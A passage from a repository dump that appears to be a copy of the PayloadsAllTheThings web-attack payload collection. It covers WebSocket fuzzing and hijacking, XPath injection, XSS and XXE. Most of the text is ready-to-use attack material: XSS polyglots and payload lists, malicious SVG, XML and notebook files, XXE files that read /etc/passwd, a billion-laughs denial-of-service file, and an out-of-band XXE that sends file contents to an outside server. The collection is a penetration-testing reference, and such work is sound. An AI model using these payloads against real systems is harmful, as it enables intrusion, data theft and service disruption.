35 |         fuzz_value = qs['fuzz']
36 |         result = FuzzWebSocket(fuzz_value)
37 |         self.send_response(200)
38 |         self.send_header('Content-type','text/html')
39 |         self.end_headers()
40 |         self.wfile.write(result)
41 |         return
42 | 
43 | parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
44 | parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
45 | parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
46 | args = parser.parse_args()
47 | 
48 | ws_message = LoadMessage(args.message)
49 | 
50 | ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
51 | 
52 | try:
53 |     #Create a web server and define the handler to manage the
54 |     #incoming request
55 |     server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
56 |     print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
57 |     
58 |     #Wait forever for incoming http requests
59 |     server.serve_forever()
60 | 
61 | except KeyboardInterrupt:
62 |     print('^C received, shutting down the web server')
63 |     server.socket.close()
64 |     ws.close()
65 | 


--------------------------------------------------------------------------------
/Web Sockets/Images/WebsocketHarness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/WebsocketHarness.jpg


--------------------------------------------------------------------------------
/Web Sockets/Images/sqlmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/sqlmap.png


--------------------------------------------------------------------------------
/Web Sockets/Images/websocket-harness-start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/websocket-harness-start.png


--------------------------------------------------------------------------------
/Web Sockets/README.md:
--------------------------------------------------------------------------------
 1 | # Web Sockets Attacks
 2 | 
 3 | > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Using ws-harness.py](#using-ws-harness-py)
 9 | 
10 | ## Tools
11 | 
12 | * [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
13 | 
14 | ## Using ws-harness.py
15 | 
16 | Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
17 | 
18 | ```powershell
19 | python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
20 | ```
21 | 
22 | The content of the message should contains the **[FUZZ]** keyword.
23 | 
24 | ```json
25 | {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
26 | ```
27 | 
28 | Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
29 | 
30 | ```python
31 | sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
32 | ```
33 | 
34 | ## Cross-Site WebSocket Hijacking (CSWSH)
35 | 
36 | If the WebSocket handshake is not correctly protected using a CSRF token or a
37 | nonce, it's possible to use the authenticated WebSocket of a user on an
38 | attacker's controlled site because the cookies are automatically sent by the
39 | browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
40 | 
41 | Example exploit, hosted on an attacker's server, that exfiltrates the received
42 | data from the WebSocket to the attacker:
43 | 
44 | ```html
45 | 
55 | ```
56 | 
57 | You have to adjust the code to your exact situation. E.g. if your web
58 | application uses a `Sec-WebSocket-Protocol` header in the handshake request,
59 | you have to add this value as a 2nd parameter to the `WebSocket` function call
60 | in order to add this header.
61 | 
62 | ## References
63 | 
64 | - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
65 | - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
66 | - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
67 | 


--------------------------------------------------------------------------------
/XPATH Injection/README.md:
--------------------------------------------------------------------------------
 1 | # XPATH injection
 2 | 
 3 | > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Exploitation](#exploitation)
 8 | * [Blind exploitation](#blind-exploitation)
 9 | * [Out Of Band Exploitation](#out-of-band-exploitation)
10 | * [Tools](#tools)
11 | * [References](#references)
12 | 
13 | ## Exploitation
14 | 
15 | Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
16 | 
17 | ```sql
18 | ' or '1'='1
19 | ' or ''='
20 | x' or 1=1 or 'x'='y
21 | /
22 | //
23 | //*
24 | */*
25 | @*
26 | count(/child::node())
27 | x' or name()='username' or 'x'='y
28 | ' and count(/*)=1 and '1'='1
29 | ' and count(/@*)=1 and '1'='1
30 | ' and count(/comment())=1 and '1'='1
31 | search=')] | //user/*[contains(*,'
32 | search=Har') and contains(../password,'c
33 | search=Har') and starts-with(../password,'c
34 | ```
35 | 
36 | ## Blind Exploitation
37 | 
38 | 1. Size of a string
39 |     ```sql
40 |     and string-length(account)=SIZE_INT
41 |     ```
42 | 2. Extract a character
43 |     ```sql
44 |     substring(//user[userid=5]/username,2,1)=CHAR_HERE
45 |     substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
46 |     ```
47 | 
48 | ## Out Of Band Exploitation
49 | 
50 | ```powershell
51 | http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
52 | ```
53 | 
54 | ## Tools
55 | 
56 | - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
57 | - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool 
58 | - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text 
59 | - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
60 | - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
61 | 
62 | ## References
63 | 
64 | * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
65 | * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
66 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/">:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/">


--------------------------------------------------------------------------------
/XSS Injection/Files/'>:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/'>


--------------------------------------------------------------------------------
/XSS Injection/Files/InsecureFlashFile.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/InsecureFlashFile.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/JupyterNotebookXSS.ipynb:
--------------------------------------------------------------------------------
 1 | {
 2 |  "cells": [
 3 |   {
 4 |    "cell_type": "markdown",
 5 |    "metadata": {},
 6 |    "source": [
 7 |     "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
 8 |    ]
 9 |   }
10 |  ],
11 |  "metadata": {
12 |   "kernelspec": {
13 |    "display_name": "Python 3",
14 |    "language": "python",
15 |    "name": "python3"
16 |   },
17 |   "language_info": {
18 |    "codemirror_mode": {
19 |     "name": "ipython",
20 |     "version": 3
21 |    },
22 |    "file_extension": ".py",
23 |    "mimetype": "text/x-python",
24 |    "name": "python",
25 |    "nbconvert_exporter": "python",
26 |    "pygments_lexer": "ipython3",
27 |    "version": "3.6.2"
28 |   }
29 |  },
30 |  "nbformat": 4,
31 |  "nbformat_minor": 2
32 | }
33 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS.svg:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 |    
6 |    
9 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS1.svg:
--------------------------------------------------------------------------------
1 | </desc><script>alert(1)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS2.svg:
--------------------------------------------------------------------------------
1 | </foreignObject><script>alert(2)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS3.svg:
--------------------------------------------------------------------------------
1 | </title><script>alert(3)</script>
2 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/SWF_XSS.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/SWF_XSS.swf


--------------------------------------------------------------------------------
/XSS Injection/Files/mouseover-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/mouseover-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/onclick-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/onclick-xss-ecs.jpeg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.jpg


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.png


--------------------------------------------------------------------------------
/XSS Injection/Files/payload_text_xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_text_xss.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xml.xsd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.cer:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.dtd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.htm:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.html.demo:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.hxt:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.mno:
--------------------------------------------------------------------------------
1 | alert(1337)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.rdf:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.svgz:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.url.url:
--------------------------------------------------------------------------------
1 | 
2 |     
3 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.vml:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.wsdl:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xht:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xhtml:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xml:
--------------------------------------------------------------------------------
 1 | 
 2 | 	
 3 | 	
 4 | 		alert(1)
 5 | 		alert(2)
 6 | 		
 7 | 		  
 8 | 		    confirm(document.domain)]]>
 9 | 		  
10 | 		    
11 | 		      Hello
12 | 		    
13 | 		    
14 | 		      http://google.com
15 | 		    
16 | 		
17 | 	
18 | 
19 | 


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsd:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsf:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsl:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xslt:
--------------------------------------------------------------------------------
1 | alert(1)


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png


--------------------------------------------------------------------------------
/XSS Injection/Images/DwrkbH1VAAErOI2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Images/DwrkbH1VAAErOI2.jpg


--------------------------------------------------------------------------------
/XSS Injection/Intruders/0xcela_event_handlers.txt:
--------------------------------------------------------------------------------
  1 | FSCommand
  2 | onAbort
  3 | onActivate
  4 | onAfterPrint
  5 | onAfterUpdate
  6 | onBeforeActivate
  7 | onBeforeCopy
  8 | onBeforeCut
  9 | onBeforeDeactivate
 10 | onBeforeEditFocus
 11 | onBeforePaste
 12 | onBeforePrint
 13 | onBeforeUnload
 14 | onBeforeUpdate
 15 | onBegin
 16 | onBlur
 17 | onBounce
 18 | onCellChange
 19 | onChange
 20 | onClick
 21 | onContextMenu
 22 | onControlSelect
 23 | onCopy
 24 | onCut
 25 | onDataAvailable
 26 | onDataSetChanged
 27 | onDataSetComplete
 28 | onDblClick
 29 | onDeactivate
 30 | onDrag
 31 | onDragDrop
 32 | onDragEnd
 33 | onDragEnter
 34 | onDragLeave
 35 | onDragOver
 36 | onDragStart
 37 | onDrop
 38 | onEnd
 39 | onError
 40 | onErrorUpdate
 41 | onFilterChange
 42 | onFinish
 43 | onFocus
 44 | onFocusIn
 45 | onFocusOut
 46 | onHashChange
 47 | onHelp
 48 | onInput
 49 | onKeyDown
 50 | onKeyPress
 51 | onKeyUp
 52 | onLayoutComplete
 53 | onLoad
 54 | onLoseCapture
 55 | onMediaComplete
 56 | onMediaError
 57 | onMessage
 58 | onMouseDown
 59 | onMouseEnter
 60 | onMouseLeave
 61 | onMouseMove
 62 | onMouseOut
 63 | onMouseOver
 64 | onMouseUp
 65 | onMouseWheel
 66 | onMove
 67 | onMoveEnd
 68 | onMoveStart
 69 | onOffline
 70 | onOnline
 71 | onOutOfSync
 72 | onPaste
 73 | onPause
 74 | onPopState
 75 | onProgress
 76 | onPropertyChange
 77 | onReadyStateChange
 78 | onRedo
 79 | onRepeat
 80 | onReset
 81 | onResize
 82 | onResizeEnd
 83 | onResizeStart
 84 | onResume
 85 | onReverse
 86 | onRowDelete
 87 | onRowExit
 88 | onRowInserted
 89 | onRowsEnter
 90 | onScroll
 91 | onSeek
 92 | onSelect
 93 | onSelectStart
 94 | onSelectionChange
 95 | onStart
 96 | onStop
 97 | onStorage
 98 | onSubmit
 99 | onSyncRestored
100 | onTimeError
101 | onTrackChange
102 | onURLFlip
103 | onUndo
104 | onUnload
105 | seekSegmentTime
106 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt:
--------------------------------------------------------------------------------
 1 | alert`1`
 2 | alert(1)
 3 | alert(1)
 4 | alert(1)
 5 | (alert)(1)
 6 | a=alert,a(1)
 7 | [1].find(alert)
 8 | top["al"+"ert"](1)
 9 | top[/al/.source+/ert/.source](1)
10 | al\u0065rt(1)
11 | top['al\145rt'](1)
12 | top['al\x65rt'](1)
13 | top[8680439..toString(30)](1)
14 | navigator.vibrate(500)
15 | eval(URL.slice(-8))>#alert(1)
16 | eval(location.hash.slice(1)>#alert(1)
17 | innerHTML=location.hash>#
18 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/XSS_Polyglots.txt:
--------------------------------------------------------------------------------
 1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
 2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
 3 | “ onclick=alert(1)//"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
16 | 


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_payloads_quick.txt:
--------------------------------------------------------------------------------
 1 | javascript:alert(1)//INJECTX
 2 | <svg/onload=alert(1)>//INJECTX
 3 | <img onload=alert(1)>//INJECTX
 4 | <img src=x onerror=prompt(1)>//INJECTX
 5 | <a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a>
 6 |  onmouseover="document.cookie=true;">//INJECTX
 7 | alert(1)>//INJECTX
 8 | <h1>INJECTX</h1>
 9 | <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
10 | <svg><script>/<@/>alert(1)</script>//INJECTX
11 | <svg/onload=alert(/INJECTX/)>
12 | <iframe/onload=alert(/INJECTX/)>
13 | <svg/onload=alert`INJECTX`>
14 | <svg/onload=alert(/INJECTX/)>
15 | <svg/onload=alert(`INJECTX`)>
16 | }alert(/INJECTX/);{//
17 | <h1/onclick=alert(1)>a//INJECTX
18 | <svg/onload=alert(/INJECTX/)>
19 | <p/onclick=alert(/INJECTX/)>a
20 | <svg/onload=alert`INJECTX`>
21 | <svg/onload=alert(/INJECTX/)>
22 | <svg/onload=alert(`INJECTX`)>
23 | <video><source onerror="javascript:alert(1)">//INJECTX
24 | <video onerror="javascript:alert(1)"><source>//INJECTX
25 | <audio onerror="javascript:alert(1)"><source>//INJECTX
26 | <input autofocus onfocus=alert(1)>//INJECTX
27 | <select autofocus onfocus=alert(1)>//INJECTX
28 | <textarea autofocus onfocus=alert(1)>//INJECTX
29 | <keygen autofocus onfocus=alert(1)>//INJECTX
30 | <button form=test onformchange=alert(1)>//INJECTX
31 | <form><button formaction="javascript:alert(1)">//INJECTX
32 | <svg onload=(alert)(1) >//INJECTX
33 | <script>$=1,alert($)</script>//INJECTX
34 | <!--<img src="--><img src=x onerror=alert(1)//">//INJECTX
35 | <img/src='x'onerror=alert(1)>//INJECTX
36 | <marguee/onstart=alert(1)>//INJECTX
37 | <script>alert(1)//INJECTX
38 | <script>alert(1)<!--INJECTX
39 | <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX


--------------------------------------------------------------------------------
/XSS Injection/Intruders/xss_swf_fuzz.txt:
--------------------------------------------------------------------------------
 1 | #getURL,javascript:alert(1)",
 2 | #goto,javascript:alert(1)",	
 3 | ?javascript:alert(1)",
 4 | ?alert(1)",
 5 | ?getURL(javascript:alert(1))",
 6 | ?asfunction:getURL,javascript:alert(1)//",
 7 | ?getURL,javascript:alert(1)",
 8 | ?goto,javascript:alert(1)",		
 9 | ?clickTAG=javascript:alert(1)",
10 | ?url=javascript:alert(1)",
11 | ?clickTAG=javascript:alert(1)&TargetAS=",
12 | ?TargetAS=javascript:alert(1)",
13 | ?skinName=asfunction:getURL,javascript:alert(1)//",
14 | ?baseurl=asfunction:getURL,javascript:alert(1)//",
15 | ?base=javascript:alert(0)",                
16 | ?onend=javascript:alert(1)//",
17 | ?userDefined=');function someFunction(a){}alert(1)//",        
18 | ?URI=javascript:alert(1)",
19 | ?callback=javascript:alert(1)",
20 | ?getURLValue=javascript:alert(1)",
21 | ?goto=javascript:alert(1)",
22 | ?pg=javascript:alert(1)",
23 | ?page=javascript:alert(1)"
24 | ?playerready=alert(document.cookie)
25 | 


--------------------------------------------------------------------------------
/XSS Injection/XSS with Relative Path Overwrite.md:
--------------------------------------------------------------------------------
 1 | # XSS with Relative Path Overwrite - IE 8/9 and lower
 2 | 
 3 | You need these 3 components
 4 | 
 5 | ```javascript
 6 | 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))}
 7 | 2) URL Rewriting.
 8 | 3) Relative addressing to CSS style sheet : ../style.css
 9 | ```
10 | 
11 | A little example
12 | 
13 | ```html
14 | http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]
15 | <html>
16 | <head>
17 | <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
18 | <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
19 | </head>
20 | <body>
21 | Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
22 | </body>
23 | </html>
24 | ```
25 | 
26 | Explanation of the vulnerability
27 | 
28 | > The Meta element forces IE’s document mode into IE7 compat which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert.
29 | > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works.
30 | 
31 | Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`
32 | Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`
33 | MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`
34 | 
35 | From : `http://www.thespanner.co.uk/2014/03/21/rpo/`
36 | 
37 | ## Mutated XSS for Browser IE8/IE9
38 | 
39 | ```javascript
40 | <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
41 | <script>alert(document.getElementById('x').innerHTML)</script>
42 | ```
43 | 
44 | IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
45 | 
46 | 
47 | ## References
48 | 
49 | - [TODO](TODO)


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE - etc passwd.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data (#ANY)>
4 | <!ENTITY file SYSTEM "file:///etc/passwd">
5 | ]>
6 | <data>&file;</data>
7 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE B64 Encoded.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
2 | 


--------------------------------------------------------------------------------
/XXE Injection/Files/Classic XXE.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <!DOCTYPE data [
3 | <!ELEMENT data (#ANY)>
4 | <!ENTITY file SYSTEM "file:///sys/power/image_size">
5 | ]>
6 | <data>&file;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/Deny Of Service - Billion Laugh Attack:
--------------------------------------------------------------------------------
1 | <!DOCTYPE data [
2 | <!ENTITY a0 "dos" >
3 | <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
4 | <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
5 | <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
6 | <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
7 | ]>
8 | <data>&a4;</data>


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE OOB Attack (Yunusov, 2013).xml:
--------------------------------------------------------------------------------
1 | XXE OOB Attack (Yunusov, 2013)
2 | <?xml version="1.0" encoding="utf-8"?>
3 | <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
4 | <data>&send;</data>
5 | 
6 | File stored on http://publicServer.com/parameterEntity_oob.dtd
7 | <!ENTITY % file SYSTEM "file:///sys/power/image_size">
8 | <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
9 | %all;


--------------------------------------------------------------------------------
/XXE Injection/Files/XXE PHP Wrapper.xml:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
 2 | <contacts>
 3 |   <contact>
 4 |     <name>Jean &xxe; Dupont</name>
 5 |     <phone>00 11 22 33 44</phone>
 6 |     <address>42 rue du CTF</address>
 7 |     <zipcode>75000</zipcode>
 8 |     <city>Paris</city>
 9 |   </contact>
10 | </contacts>
11 | 


--------------------------------------------------------------------------------
/YOUTUBE.md:
--------------------------------------------------------------------------------
 1 | # Youtube
 2 | 
 3 | ## Channels
 4 | 
 5 | - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 6 | - [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
 7 | - [GynvaelEN - Podcasts about CTFs, computer security, programing and similar things.](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg)
 8 | - [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
 9 | - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
10 | - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
11 | - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
12 | - [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
13 | - [STÖK](https://www.youtube.com/c/STOKfredrik)
14 | - [Defcon](https://www.youtube.com/user/DEFCONConference)
15 | - [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q)
16 | - [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
17 | - [Nahamsec](https://www.youtube.com/c/Nahamsec)
18 | - [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw)
19 | - [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
20 | - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
21 | - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
22 | 
23 | ## Conferences
24 | 
25 | - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
